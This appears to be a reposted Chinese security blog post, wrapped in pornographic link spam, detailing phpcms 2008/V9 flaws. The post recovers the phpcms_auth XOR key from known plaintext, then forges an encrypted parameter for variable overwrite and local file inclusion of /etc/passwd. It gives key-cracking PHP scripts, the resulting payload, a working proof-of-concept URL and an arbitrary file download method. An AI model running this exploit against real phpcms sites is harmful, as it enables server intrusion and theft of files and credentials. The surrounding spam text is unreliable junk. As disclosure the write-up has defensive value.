日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞...

發布時間:2023/12/10 php 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞... 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

?phpcms的phpcms_auth導致的本地文件包含漏洞和任意文件下載漏洞

by c4rp3nt3r@0x50sec.org
mail: c4rp3nt3r#gmail.com
HomePage:http://www.0x50sec.org

phpcms_auth函數是phpcms里面為了增強程序的安全性的一個加密函數,在play.php、down.php 、download.php等等文件用它來對用戶提交的加密字符串進行解密,進入程序流程,如果我們可以控制了phpcms_auth函數的解密,我們就可以通過注射我們的惡意代碼,進行攻擊。
而phpcms_auth采用的是可逆的位異或算法,并且對加密的結果進行了base64編碼。
對于位異或算法來說只要我們破解了密鑰字符串$key我們就完全控制了這個函數的加密解密。
對于base64編碼主要是處理某些加密后的不可見字符,但是這給了我們一個很好的機會:
就是說我們破解了$key之后,我們就可以不受magic_quotes_pgc的限制引入%00字符串進行階段,或者引入引號發起其他攻擊。
到此已經違背了這個程序設計的初衷,破解了這個函數之后,一方面反而更加不安全了,另一方面所有建立在這個函數之上的機制可能都會受到攻擊。

// include/global.func.php
function phpcms_auth($txt, $operation = 'ENCODE', $key = '')
{
$key??? = $key ? $key : $GLOBALS['phpcms_auth_key'];
$txt??? = $operation == 'ENCODE' ? $txt : base64_decode($txt);
$len??? = strlen($key);
$code??? = '';

?

for($i=0; $i<strlen($txt); $i++){
$k??? ??? = $i % $len;??? //循環使用密鑰字符串對字符串逐位進行異或
$code? .= $txt[$i] ^ $key[$k];
}
$code = $operation == 'DECODE' ? $code : base64_encode($code);
return $code;
}

對于$key的破解
對于位運算的異或運算,是可逆的,明文和密鑰異或得到密文。如果我們知道密文并且知道一部分明文那么我們也就可以得到密鑰,有了密鑰我們就可以破解另一部分密文,當然也就可以對我們自己的明文進行加密,然后用我們精心構造的密文發起攻擊了。

不幸的是phpcms的確給了我們可用來破解密鑰的明文。

// include/fields/downfile/output.inc.php

?

function downfile($field, $value)
{
$contentid = $this->contentid;
$mode = $this->fields[$field]['mode'];
$result = '';
if($mode)
{
$servers = $this->fields[$field]['servers'];
$downloadtype = $this->fields[$field]['downloadtype'];
$servers = explode("\n",$servers);
foreach($servers AS $k=>$server)
{
$server = explode("|",$server);
$serverurl = $server[1];
$a_k = urlencode(phpcms_auth("i=$contentid&s=$serverurl&m=1&f=$value&d=$downloadtype", 'ENCODE', AUTH_KEY));
$result .= "<a href='down.php?a_k=$a_k' target='_blank'>$server[0]</a>";
}
}
else
{
$a_k = urlencode(phpcms_auth("i=$contentid&m=0&f=$value", 'ENCODE', AUTH_KEY));
$result = "<a href='down.php?a_k=$a_k' target='_blank'>點擊下載</a>";
}
return $result;
}

這個文件是用來生成靜態html文件的,默認安裝的phpcms某個軟件的下載頁面地址為:

http://127.0.0.1/n/phpcms/2011/0331/2.html

進入下載文件的下載地址為:

http://127.0.0.1/n/phpcms/down.php?a_k=GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D

對加密字符串解密后為
密文:GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D
明文:i=2&s=&m=0&f=uploadfile/2011/0331/20110331121233766.zip&d=1
這里2.html的2就是數據庫里id的值,如果沒有設置鏡像站點的話$serverurl為空
也就是說”i=2&s=&m=1&f=”是不會變的,我們可以破解12位的密鑰了。
默認的話密鑰有20位,如果用戶上傳目錄沒修改的話我們知道的明文就有”i=2&s=&m=0&f=uploadfile”共23個字符,可以得到全部密鑰了。

$key="i=2&s=&m=0&f=uploadfile";
$txt='GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D';
$txt=base64_decode(urldecode($txt));
$len=strlen($key);
echo $len;
for($i=0;$i<strlen($key);$i++)
{
$code? .= $txt[$i] ^ $key[$i];
}
echo $code;
?>
運行結果為:sIpeofogblFVCildZEwesIp
可以看到sIp開始下一個循環加密了,所以密鑰就是:sIpeofogblFVCildZEwe

還有一點就是下載的時候我們可以得到文件名:20110331121233766.zip
d的值是下載文件的類型,假設我們不知道也不要緊
就是說明文:20110331121233766.zip&d=是已知的有24位
密文:GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D

$key="20110331121233766.zip&d=";
$txt='GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D';

?

$txt=base64_decode(urldecode($txt));
$tlen=strlen($txt);
$klen=strlen($key);
for($i=1;$i<strlen($key);$i++)
{
$code? .= $txt[$tlen-$i-1] ^ $key[$klen-$i];
}
echo $code."\n";
echo $tlen."\n";
?>

運行結果為:
EZdliCVFlbgofoepIsewEZd
59
來看phpcms_auth源碼
/*
...
$len??? = strlen($key);
...

?

for($i=0; $i<strlen($txt); $i++){
$k??? ??? = $i % $len;
$code? .= $txt[$i] ^ $key[$k];
}
...
*/

我們可以知道
$key[17]=’E';
我們可以得到倒序的密鑰字符串:
ewEZdliCVFlbgofoepIs

然后我們把字符串翻轉過來終端下執行:

alone@Sh3llc0de:~$ echo ‘ewEZdliCVFlbgofoepIs’|rev
sIpeofogblFVCildZEwe

我們的密鑰字符串就是:sIpeofogblFVCildZEwe

到此我們已經從一個攻擊者的角度破解出了密鑰。接下來我們看看由此引發的幾個安全問題
————————————-

1.phpcms2008 sp2-sp4 本地文件包含漏洞
這個漏洞跟boblog剛爆出的任意變量覆蓋漏洞有些相似,都是任意變量覆蓋然后僅跟了一個本地文件包含。這種漏洞也是很好玩的,攻擊的方法更靈活。

//play.php
require dirname(__FILE__).'/include/common.inc.php';
if(!isset($a_k)) showmessage($LANG['illegal_parameters']);
//common.inc.php文件的全局變量機制已經將所有GPC數據導出為變量了
//所以$a_k=$_GET[$a_k];
$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //這里是關鍵分析見上文

if(empty($a_k)) showmessage($LANG['illegal_parameters']);
unset($i, $m, $f, $p);
parse_str($a_k);??? //parse_str處理解密后的$a_k將導致變量覆蓋
//通過覆蓋下文的$mod 或者$templateid將觸發本地文件包含漏洞
//由于我們提交的密文會經過phpcms_auth函數中base64解密的,所以直接無視magic_quotes_gpc的影響而可以NULL字符截斷
//但是高版本的PHP修復了%00的攻擊缺陷

if(isset($i)) $i = intval($i);
if(!isset($m)) showmessage($LANG['illegal_parameters']);

if(empty($f)) showmessage('地址失效');
if(preg_match('/\.php$/',$f) || strpos($f, ":\\")) showmessage('地址有誤');
if(!$i || $m<0) showmessage($LANG['illegal_parameters']);
$allow_readpoint = 1;
// include global.fuc.php
/*
...
$M = $TEMP = array();
if(!isset($mod)) $mod = 'phpcms';
if($mod != 'phpcms')
{
isset($MODULE[$mod]) or exit($LANG['module_not_exists']);
$langfile = defined('IN_ADMIN') ? $mod.'_admin' : $mod;
@include PHPCMS_ROOT.'languages/'.LANG.'/'.$langfile.'.lang.php';
$M = cache_read('module_'.$mod.'.php');
}
...
*/
//此處通過上文的對$mod進行變量覆蓋繞過下面的if語句
if($mod == 'phpcms')
{
$contentid = $i;
include 'admin/content.class.php';
$content = new content;
$data = $content->get($contentid);
$readpoint = $data['readpoint'];

$title = $data['title'];
$keys = array_keys($data);

if(in_array('groupids_view',$keys))
{
if($data['groupids_view'])
{
if(!$priv_group->check('contentid', $contentid, 'view', $_groupid)) showmessage('您沒有查看權限');
}
if(in_array('readpoint', $keys))
{
$C = cache_read('category_'.$data['catid'].'.php');
if($C['defaultchargepoint'] || !empty($readpoint))
{
$readpoint = $readpoint ? $readpoint : $C['defaultchargepoint'];
$pay = load('pay_api.class.php', 'pay', 'api');
if($C['repeatchargedays'])
{
if($pay->is_exchanged($contentid, $C['repeatchargedays']) === FALSE)
{
$allow_readpoint = 0;
}
}
else
{
session_start();
if($_SESSION['pay_contentid'] != $contentid) $allow_readpoint = 0;
}
}
}
}
}

$player = load('player.class.php');
$result = $player->get($p);
@extract($result);
$videourl = trim($f);
$code = str_replace('{$filepath}',$videourl, $code);
$code = str_replace('{$PHPCMS[siteurl]}', $PHPCMS['siteurl'], $code);
$code = str_replace('{$PHPCMS[sitename]}', $PHPCMS['sitename'], $code);
$templateid = $templateid ? $templateid : 'play';
include template($mod, $templateid);
/*
// include/global.fuc.php
// function template 起到一個連接字符串的作用

function template($module = 'phpcms', $template = 'index', $istag = 0)
{
$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
if(TPL_REFRESH && (!file_exists($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/tag.inc.php') > @filemtime($compiledtplfile)))
{
require_once PHPCMS_ROOT.'include/template.func.php';
template_compile($module, $template, $istag);
}
return $compiledtplfile;
}

*/
?>

接下來生成我們的攻擊字符串:
$key='sIpeofogblFVCildZEwe';
$evil='i=1&m=1&f=fuck&mod=../../../../../../../etc/passwd%00&c4rp3nt3r=0x50sec.org';
//經過parse_str($evil);后c4rp3nt3r變量并沒有被創建
//這個地方我也不是很明白為什么可以進行截斷
//但事實上真的可以截斷

$evil = phpcms_auth($evil, 'ENCODE', $key);
echo $evil."\n";
function phpcms_auth($txt, $operation = 'ENCODE', $key)
{
$txt??? = $operation == 'ENCODE' ? $txt : base64_decode($txt);
$len??? = strlen($key);
$code??? = '';

for($i=0; $i<strlen($txt); $i++){
$k??? ??? = $i % $len;
$code? .= $txt[$i] ^ $key[$k];
}
$code = $operation == 'DECODE' ? $code : base64_encode($code);
return $code;
}
?>

alone@Sh3llc0de:/var/www$ php v.php
GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL

POC:http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL
成功包含了/etc/passwd

2.phpcms2008 sp2-sp4、PHPCMS V9 正式版任意文件下載漏洞

以phpcms2008為例

down.php 和download.php都存在這個漏洞,具體利用跟上面的文件包含差不多就不多羅嗦了,成功利用此漏洞可以下載任意文件,包括.php后綴的文件。
只是download.php的加密方式是:
//download.php

$phpcms_auth_key = md5(AUTH_KEY.$_SERVER['HTTP_USER_AGENT']);
$a_k = phpcms_auth($a_k, ‘DECODE’, $phpcms_auth_key);

這樣可能主要是為了仿制迅雷等瀏覽器的下載。但是既然我們知道了AUTH_KEY(見上文分析的密鑰$key),$_SERVER['HTTP_USER_AGENT']是由用戶提交的,那么$phpcms_auth_key 我們自然也就知道了。
除了上面說的知道部分明文來算$key,還有可能暴力破解$key.
還有就是經過md5加密后也未必就更安全,因為系統生成的$key有20位但是每一位都肯能個是大寫或者小寫字母,也就是有52種可能,但是經過md5加密后每一位就變成只有16種可能了,大大增加了被暴力破解的可能性。

全文結束
參考和致謝:
80vul.com《高級PHP應用程序漏洞審核技術》
Ryat[puretot] 《bo-blog任意變量覆蓋漏洞》













本文轉hackfreer51CTO博客,原文鏈接:http://blog.51cto.com/pnig0s1992/537457,如需轉載請自行聯系原作者

總結

以上是生活随笔為你收集整理的phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞...的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

亚洲一级电影在线观看 | 国产黄色片免费观看 | 亚洲第一香蕉视频 | .国产精品成人自产拍在线观看6 | 韩国在线视频一区 | 91精品免费在线观看 | 精品国产资源 | 色婷婷免费视频 | 欧美午夜精品久久久久久孕妇 | 国产在线一区二区三区播放 | 99福利片 | 免费福利视频导航 | 97精品视频在线 | 亚洲综合最新在线 | av官网在线 | 日韩中文字幕在线看 | 中文字幕成人一区 | 91精品国产自产在线观看永久 | 天天爽综合网 | 色偷偷88888欧美精品久久 | 69国产盗摄一区二区三区五区 | 日韩免费一区二区 | 国产少妇在线观看 | 少妇性xxx| 国产精品一区二区在线播放 | 天天躁日日躁狠狠躁av麻豆 | 国产字幕在线播放 | av不卡网站 | 国产精品你懂的在线观看 | 日本资源中文字幕在线 | 欧美先锋影音 | 综合色久| 91av久久| 91精品免费看 | 国产精品69av | 中文字幕亚洲五码 | 婷婷丁香九月 | 成人久久久久久久久久 | 久久国产精品99久久久久久进口 | 天天爱综合 | 日韩精品中文字幕av | 成人一级免费视频 | 久久看片网站 | 国产黄色精品网站 | 欧美色图亚洲图片 | 伊香蕉大综综综合久久啪 | 天天摸夜夜添 | 欧美另类亚洲 | 精品国产一区二区三区久久久 | 超碰97中文 | 免费三级黄 | 日本99精品 | 天天搞天天干 | 日本aaa在线观看 | 香蕉视频免费在线播放 | 亚洲精品视频在线观看视频 | 国产视频1区2区3区 久久夜视频 | 亚洲国产中文在线观看 | 国产一区二区在线精品 | 国产视频导航 | 久精品视频免费观看2 | 欧美 日韩 国产 成人 在线 | 在线v片免费观看视频 | 国产又黄又硬又爽 | 国产1级视频 | 亚洲伊人色 | 91视频久久久久久 | 久久精国产 | 91激情视频在线 | 西西444www大胆高清视频 | 免费视频成人 | 99视| 天天插天天操天天干 | 国产精品久久精品国产 | 天天综合天天做天天综合 | 日韩视频a| 国产美女视频黄a视频免费 久久综合九色欧美综合狠狠 | 97天堂 | 久久伊人八月婷婷综合激情 | 国产精品99久久免费观看 | 日韩欧美国产激情在线播放 | www.五月天婷婷 | ww亚洲ww亚在线观看 | 最新不卡av | 一区二区三区久久 | 成人免费观看视频网站 | 久九视频| 天天干,天天射,天天操,天天摸 | 国产精品久久久av久久久 | 狠狠色丁香婷婷综合基地 | 久久久男人的天堂 | 久久人人精 | 黄色av网站在线免费观看 | 久久99精品国产91久久来源 | 欧美狠狠色 | 日韩午夜精品 | av高清一区二区三区 | 国产精品久久99综合免费观看尤物 | 亚洲免费视频观看 | 在线看片91| 韩日在线一区 | 91亚洲精品久久久久图片蜜桃 | 亚洲色图 校园春色 | 成人h在线播放 | 久久伊人精品一区二区三区 | 亚洲欧洲av在线 | 欧美人人| 在线有码中文字幕 | 在线日韩中文 | 午夜狠狠干 | 久久综合影视 | www.天堂av| 色综合久久66 | 一级片免费在线 | 欧美特一级 | 久九视频| 色综合久久精品 | 在线小视频 | 最新av免费在线 | 欧美一区二区三区激情视频 | 欧美一级性生活 | 国产探花 | 日韩av手机在线观看 | 国产精品扒开做爽爽的视频 | 激情av在线播放 | 国产伦理一区二区 | 亚洲成人黄色网址 | 久久综合狠狠综合 | 精品一区二区三区久久久 | 特级毛片aaa | 午夜久久久久久久久久影院 | 欧美日韩一级视频 | 在线电影日韩 | 欧美日韩午夜 | 亚洲综合色播 | 久免费视频 | 丁香花在线观看视频在线 | 久久综合9988久久爱 | 久久人人爽爽人人爽人人片av | 69视频永久免费观看 | 国产精品亚洲人在线观看 | 日韩视频www | 欧美日韩高清一区二区 国产亚洲免费看 | 久久99九九99精品 | 免费在线观看一区二区三区 | 中文字幕在线国产精品 | 最近能播放的中文字幕 | 天天摸日日操 | 久草在线高清视频 | 精品在线视频观看 | 亚洲免费av一区二区 | 亚洲国产成人在线 | 日韩有色 | 天天色天天搞 | 久久人人爽爽人人爽人人片av | 国产女v资源在线观看 | 国产破处在线播放 | 亚洲自拍偷拍色图 | 日韩三级视频 | 国产资源在线播放 | 最近中文字幕完整视频高清1 | 天天插天天干天天操 | 探花视频免费观看高清视频 | 美女在线免费视频 | 欧美在线观看视频一区二区 | 成人国产精品免费 | 国偷自产视频一区二区久 | 中文字幕在线观看三区 | 手机看片久久 | 波多野结衣在线视频一区 | 麻豆91网站 | 国产 在线观看 | 久草久草久草久草 | 成人免费在线播放 | 日韩高清在线不卡 | 精品国产一区二区三区四区在线观看 | 色婷婷在线视频 | 一区二区三区日韩精品 | 亚洲欧美日本国产 | 五月天丁香视频 | 99久久精品免费看国产免费软件 | 国产69久久| 九七在线视频 | 国产精品视屏 | 91av99 | 国产专区视频 | 亚洲视频,欧洲视频 | 96看片| 亚洲免费在线播放视频 | 91av资源在线 | 日韩成人邪恶影片 | 国产美女无遮挡永久免费 | 麻豆一精品传二传媒短视频 | 91精品国| 欧美日韩啪啪 | 免费黄色激情视频 | 久热久草在线 | 香蕉免费在线 | 国产精品一区久久久久 | 成人a级黄色片 | 免费看片在线观看 | 综合国产在线 | 美女久久网站 | av福利网址导航大全 | 狠狠躁日日躁夜夜躁av | 国产视频18 | 人人搞人人搞 | 蜜桃久久久| 国产一区二区视频在线 | 国产69精品久久久久久久久久 | 国产精品一区久久久久 | 中文字幕永久在线 | 午夜精品av | 亚洲污视频 | 久久视频网 | 日韩一级黄色av | 中文字幕日韩电影 | www国产精品com | 国产视频精选 | 最近免费观看的电影完整版 | 精品久久久久久久久久久久久 | 日本h在线播放 | 色99在线| 久久人人干 | av电影一区 | 日韩免费视频观看 | 色噜噜日韩精品欧美一区二区 | 亚洲 欧美变态 另类 综合 | 少妇视频在线播放 | 毛片黄色一级 | 久久尤物电影视频在线观看 | 在线视频麻豆 | 51久久夜色精品国产麻豆 | 中文乱幕日产无线码1区 | 色噜噜在线观看 | 成人免费观看在线视频 | 日日弄天天弄美女bbbb | 中文字幕文字幕一区二区 | 天天射天天干天天插 | 亚洲日本成人网 | 国产精品高潮呻吟久久av无 | 亚洲欧美在线综合 | 国产麻豆精品免费视频 | 亚洲精品国产成人 | 中文字幕影片免费在线观看 | 久久激情小视频 | 狠狠ri| 成人免费视频在线观看 | 国产黄色片一级 | 欧美日韩不卡在线观看 | 在线观看mv的中文字幕网站 | 精品久久一二三区 | 欧美日韩国产精品一区二区亚洲 | 欧美久久久 | 免费涩涩网站 | 日韩精品久久久久久久电影竹菊 | 久久精品区 | 日韩精品一区二区在线观看 | 香蕉视频最新网址 | 国产成人在线免费观看 | 81精品国产乱码久久久久久 | 免费黄色在线网站 | 波多野结衣久久资源 | 成人国产综合 | 日韩精品免费一区二区在线观看 | 国产精品日韩高清 | japanese黑人亚洲人4k | 国产精品美女999 | 激情网五月婷婷 | 欧美精品久 | 夜夜操天天干, | 天天干国产| 黄色aaa级片 | 国产精品videossex国产高清 | 精品国产一区二区三区久久久蜜月 | 色综合久久久网 | 国产伦精品一区二区三区在线 | 成人av免费播放 | 精品v亚洲v欧美v高清v | 久久中文网| 日本精品xxxx | 狠狠色综合欧美激情 | 一本一本久久a久久 | 日韩欧美视频一区二区 | 国产91影视| 亚洲片在线 | 免费99精品国产自在在线 | 中文字幕在线播放日韩 | 国产精品99久久久 | 欧美成年网站 | 天天爽天天爽 | 午夜私人影院久久久久 | 国产精品一区二区久久国产 | 伊人午夜视频 | 黄色天堂在线观看 | 综合色中色 | 亚洲第二色 | v片在线播放 | 国产午夜精品一区二区三区 | 97超碰伊人 | 午夜视频日本 | av网站有哪些 | 免费视频一区 | 日韩v在线 | 国产99久久九九精品免费 | 国产99久久99热这里精品5 | 欧美一二区视频 | 欧美日韩国产精品一区二区三区 | 欧美性生活大片 | 91成人在线视频观看 | 91视频在线观看下载 | 九九激情视频 | 欧美一级电影 | 精品色综合 | 亚洲综合激情五月 | 欧美专区国产专区 | 在线观看亚洲电影 | 国产午夜精品免费一区二区三区视频 | 国产一区二区手机在线观看 | 成人黄色电影在线播放 | 国产97色在线 | 国产69精品久久久久9999apgf | h久久| 中文字幕文字幕一区二区 | 2019中文字幕第一页 | 日韩免费看的电影 | 免费av电影网站 | www.香蕉视频在线观看 | 91av视频导航| 国产一区二区不卡视频 | 天天色棕合合合合合合 | 亚洲欧美视频网站 | 波多野结衣最新 | 久久久久久激情 | 五月天网页 | 欧美另类z0zx| 国产精品久久久一区二区 | 中文字幕乱偷在线 | 欧美性春潮 | 久草视频在线免费播放 | 九九九九九九精品任你躁 | 91精品国产一区二区在线观看 | 欧美日韩在线观看不卡 | 日韩中文字幕在线观看 | 国产色网站 | 欧美日韩精品在线观看视频 | 黄色小说免费在线观看 | 国产精品一码二码三码在线 | 这里有精品在线视频 | 久久这里有 | 激情视频免费在线 | 天天干夜夜爱 | 中文字幕在线免费看线人 | 999精品 | 久草在在线 | 97成人免费视频 | 亚洲手机av | 美女网站视频久久 | 婷婷视频 | 丰满少妇一级 | 亚洲激情在线播放 | 伊人va| 国产精品自产拍在线观看网站 | 九九视频这里只有精品 | 国产一级片一区二区三区 | 欧美日韩另类视频 | 在线观看中文字幕视频 | 97成人资源| 免费看黄的视频 | 亚洲精品国产自产拍在线观看 | 日韩av进入 | 精品国内自产拍在线观看视频 | 狠狠网 | 精品国产一区二区三区四 | 国产一区成人在线 | 久久一区二区三区日韩 | 国产午夜在线观看 | 午夜精品一区二区三区四区 | 精品91久久久久 | 69精品人人人人 | 国产又粗又硬又长又爽的视频 | 欧美国产高清 | 99视频在线 | 综合色亚洲 | 欧美伦理一区二区 | 成人av在线亚洲 | 91桃色国产在线播放 | 国内精品久久久久久久97牛牛 | 97视频免费播放 | 亚洲综合小说 | 亚洲精品影院在线观看 | 丁香九月婷婷 | 日日爽| 亚洲免费一级 | 日本特黄特色aaa大片免费 | 免费a级大片 | 日韩高清一二区 | 亚洲精品国偷拍自产在线观看蜜桃 | 97夜夜澡人人双人人人喊 | 久久激情小说 | 国产成人久久av免费高清密臂 | 国产高清在线a视频大全 | 国产日韩一区在线 | 亚洲综合精品在线 | 久久久 精品 | 亚洲高清色综合 | 99久久久久久久久久 | 国产免费黄视频在线观看 | 欧美一级裸体视频 | 国产精品久久久久永久免费观看 | 免费国产在线精品 | 人人看人人草 | 久久再线视频 | 国产一区 在线播放 | 精品在线观看视频 | 日韩免费区| 天天操天 | 国产在线精品一区二区 | 亚洲午夜久久久久久久久电影网 | 亚洲激情中文 | 射久久 | 国产精品第一页在线观看 | 在线日本v二区不卡 | 99久久国产免费,99久久国产免费大片 | 婷婷激情综合 | 久久 地址 | 欧美性色综合网站 | 中文av网站 | www.com久久 | av成人黄色 | 国产一性一爱一乱一交 | 成人一区在线观看 | 成 人 黄 色 片 在线播放 | av在线播放网址 | 97色免费视频 | 视频一区二区在线 | 奇米影视8888在线观看大全免费 | 亚洲精品麻豆视频 | 国产精品高潮在线观看 | 在线看片一区 | 国产高清视频免费观看 | 国产一级a毛片视频爆浆 | 97免费在线观看 | 日韩国产欧美在线视频 | 久久草草热国产精品直播 | 日韩精品无码一区二区三区 | 色黄www小说 | 日韩中文字幕视频在线观看 | 91成人观看 | 美女视频网站久久 | 日韩在线一级 | 麻豆视频在线看 | 91av在线免费播放 | 中文字幕中文字幕在线中文字幕三区 | 操操操av | 亚洲欧洲一级 | 国产成人久久精品77777综合 | 国产涩图 | 91视频在线观看大全 | 午夜精品电影 | 国产精品24小时在线观看 | 色综合天天视频在线观看 | 波多野结衣精品视频 | 国产精品中文字幕在线播放 | 日韩欧美在线国产 | 毛片网站免费在线观看 | japanesefreesex中国少妇 | 69久久久久久久 | 四虎成人精品永久免费av九九 | 91福利影院在线观看 | se婷婷 | 五月综合网| 国产成人三级三级三级97 | 国产大陆亚洲精品国产 | 久久久九色精品国产一区二区三区 | 日韩av成人免费看 | 亚洲理论影院 | 激情综合色播五月 | 日本三级久久 | 不卡av电影在线观看 | 三级黄色欧美 | 亚洲精品2区 | 日韩丝袜视频 | 日日干av| 国产一区在线不卡 | 婷婷色网视频在线播放 | 黄色国产在线 | 天天综合网在线观看 | 国产精品综合av一区二区国产馆 | 国产亚洲免费观看 | 懂色av一区二区在线播放 | 97偷拍在线视频 | 成人亚洲精品久久久久 | 亚洲视频 在线观看 | av大全在线播放 | 国产精品高清一区二区三区 | 免费观看的黄色片 | 激情网色 | 国产一区二区免费在线观看 | www.超碰 | 免费久久精品视频 | 视频高清 | 国产在线观看,日本 | 国产一级电影在线 | 久久试看 | 在线观看日韩中文字幕 | 国产第一福利 | 欧美精品免费一区二区 | 亚洲精品在线观看中文字幕 | 国内精品视频免费 | 亚洲黄色av一区 | av观看在线观看 | 久久久精品成人 | 在线观看国产高清视频 | 欧美日本国产在线观看 | 日本一区二区三区免费看 | 激情五月激情综合网 | 亚洲成av人影院 | 久久一区二区三区日韩 | 天天操天天吃 | 色.com| 97电影院网 | 天天干天天做天天爱 | 97超级碰碰碰视频在线观看 | 日本精品免费看 | 有码中文字幕在线观看 | 黄色网在线免费观看 | 日韩欧美在线高清 | 亚洲精品视 | 91探花在线| 久久乱码卡一卡2卡三卡四 五月婷婷久 | 国产精品99久久久久久宅男 | 91看片在线 | 九九视频精品在线 | 国产成人久久 | 美女视频久久黄 | 国产精品一区二区三区电影 | 人人爱人人做人人爽 | www.69xx| 午夜电影 电影 | 99久视频 | 国产精品91一区 | 欧美极品少妇xbxb性爽爽视频 | 国产精品黄色 | 国产精品免费观看网站 | 国产黄色片一级三级 | 精品久久久久久久久久久院品网 | 综合婷婷久久 | 日韩在线第一 | 欧美日韩国产伦理 | 中文字幕在线观看你懂的 | 91视频在线国产 | 久久99国产精品免费 | 国产在线视频导航 | 欧美大片第1页 | 国产麻豆果冻传媒在线观看 | 免费观看完整版无人区 | 在线观看成人福利 | 婷婷丁香社区 | 精品视频一区在线观看 | 国产精品黄色影片导航在线观看 | 精品1区2区3区 | 日韩av二区 | 黄色特一级片 | 97自拍超碰 | 在线91av | 亚洲精品综合一区二区 | 全黄色一级片 | 97精品国产97久久久久久久久久久久 | 久久亚洲影视 | 日韩视频一区二区三区在线播放免费观看 | 激情综合网五月婷婷 | 日韩高清 一区 | 亚洲激情视频 | 九九久久婷婷 | 亚洲四虎| 国产xx视频 | 国产精品一区二区久久久 | 亚洲最大av网 | 亚洲国产精品一区二区久久,亚洲午夜 | 久久久久久久99精品免费观看 | 成人av影视观看 | 911免费视频 | 91精品成人 | 黄色在线观看污 | 午夜精品一区二区三区在线 | 久久久久久久久网站 | 在线亚洲精品 | 久久视频中文字幕 | 成人一级免费视频 | 亚洲国产视频在线 | 日韩试看 | 日韩欧美视频 | 久久久久成人精品免费播放动漫 | 中文字幕区 | 99 视频 高清 | 伊人五月在线 | www激情com| 久久国产精品久久国产精品 | 成人h动漫精品一区二 | 在线观看va| 91桃色在线免费观看 | 久久综合给合久久狠狠色 | 操高跟美女 | 99久久精品午夜一区二区小说 | 国产精品一区二区三区免费视频 | 日韩精品久久久久久久电影99爱 | 日韩欧美高清一区二区 | 91大神精品视频在线观看 | 91激情小视频 | 久久永久免费视频 | av品善网| 91视频在线国产 | 在线观看免费高清视频大全追剧 | 久久国产精品精品国产色婷婷 | av超碰在线 | 久久国内精品 | 免费网站在线观看成人 | 欧美a视频在线观看 | 毛片网站免费在线观看 | 久久视频精品在线观看 | 成人一区二区三区中文字幕 | 国产精品一区二区在线 | 国产福利精品视频 | 伊人色**天天综合婷婷 | 91av在线播放视频 | 国产69久久久 | 色婷婷精品 | 欧美日韩免费视频 | 欧美坐爱视频 | 综合国产在线观看 | 区一区二区三在线观看 | 91av欧美| 欧美日韩视频在线 | 久久久综合 | 97香蕉视频 | 色婷婷视频 | 中文字幕免费成人 | 中文字幕二区 | 日本久久中文 | 香蕉视频在线免费看 | 特级免费毛片 | 操操操日日日干干干 | 精产嫩模国品一二三区 | 欧美一区二区视频97 | www久久| 国产999精品久久久 免费a网站 | 九九免费视频 | 久久精品官网 | 99在线视频精品 | 九九激情视频 | 天天综合网~永久入口 | 一本到视频在线观看 | av日韩中文 | 日本中文字幕在线一区 | 热久久视久久精品18亚洲精品 | 天天操网 | 中文字幕中文字幕在线中文字幕三区 | 99久久电影| 9在线观看免费高清完整版在线观看明 | 热久久在线视频 | 国产999久久久 | 欧美一级性生活片 | 一区二区三区免费播放 | 丁香婷婷在线 | 91亚洲欧美 | 国产不卡视频在线 | 日韩欧美精品在线 | 天天玩天天操天天射 | 亚洲午夜av久久乱码 | 成年人免费看片网站 | 一区三区视频 | 欧美日韩高清一区二区三区 | 少妇bbbb揉bbbb日本 | 日日操狠狠干 | 三级黄色网址 | 免费a网 | 超碰在线资源 | 欧美乱码精品一区二区 | 99精品国产成人一区二区 | 三级黄色免费 | 国产精品一区二区精品视频免费看 | 91福利视频在线 | 在线播放视频一区 | 极品久久久久久久 | www.99av| 色网站免费在线观看 | 国产精品毛片久久久 | 国产精品嫩草在线 | 91成人免费视频 | 黄色软件在线观看视频 | 在线v片免费观看视频 | 久精品视频 | 久久久精华网 | 97超碰福利久久精品 | 免费看在线看www777 | 午夜婷婷在线播放 | 丁香婷婷在线 | 一区二区在线电影 | 在线影视 一区 二区 三区 | 99中文在线 | 日韩午夜电影院 | 欧美精品第一 | 日本爱爱免费 | 中文字幕亚洲综合久久五月天色无吗'' | 九九免费在线观看 | 国产69久久 | 九九免费观看全部免费视频 | 日韩在线视频网址 | 久久免费视频5 | 最近中文字幕免费大全 | 日批网站在线观看 | 国产老熟 | 在线观看免费黄视频 | 麻豆传媒在线视频 | 天天射天天艹 | 2023国产精品自产拍在线观看 | 